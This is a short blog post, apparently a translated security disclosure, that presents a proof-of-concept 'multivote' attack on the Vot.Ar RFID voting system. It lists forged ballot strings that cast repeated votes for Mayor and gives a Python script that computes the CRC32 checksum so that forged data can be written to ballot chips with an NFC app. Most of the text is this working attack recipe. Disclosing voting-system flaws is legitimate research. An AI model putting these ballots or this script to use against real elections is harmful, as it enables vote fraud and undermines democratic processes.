Multivote attack on Vot.Ar system: PoC


RFID ballots have a simple structure. The following example shows a ballot for “Representative” (REP), “Mayor” (MAY), and “Ward” (WRD) for province Buenos Aires (CABA):

06CABA.1WRD567REP432MAY123

And this is a ballot who casts three votes for category “Mayor”:

06CABA.1MAY123MAY123MAY123

And this is one that casts 10 votes for “Mayor”:

06CABA.1MAY123MAY123MAY123MAY123MAY123MAY123MAY123MAY123MAY123MAY123

There are other possibilities. The following ballot casts one vote for each category, and then adds six additional votes for “Mayor”:

06CABA.1WRD567REP432MAY123MAY123MAY123MAY123MAY123MAY123MAY123

 Multi-vote ballot generator

The Python script below generates the correct CRC32 checksum for the RFID chip. Details about the format used in these ballots is available in some Github projects. These values can be added manually through an Android-based NFC application with write capabilities, like NFC-V.

from zlib import crc32
from struct import pack
ballot="06CABA.1WRD1234REP5678MAY5678" # original
ballot="06CABA.1WRD1234MAY5678MAY5678" # 2 MAY
print "Message length: %02X" % len(ballot)
print "CRC: %s" % ' '.join(map(lambda x:"%02X"%ord(x),pack("i",crc32(ballot))))
print "Ballot data: %s" % ' '.join(map(lambda x:"%02X"%ord(x),ballot))

Translated by: Juliano Rizzo

This is a short description of the Multivote attack Proof of Concept on the Vot.Ar system.  More info in the full report.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *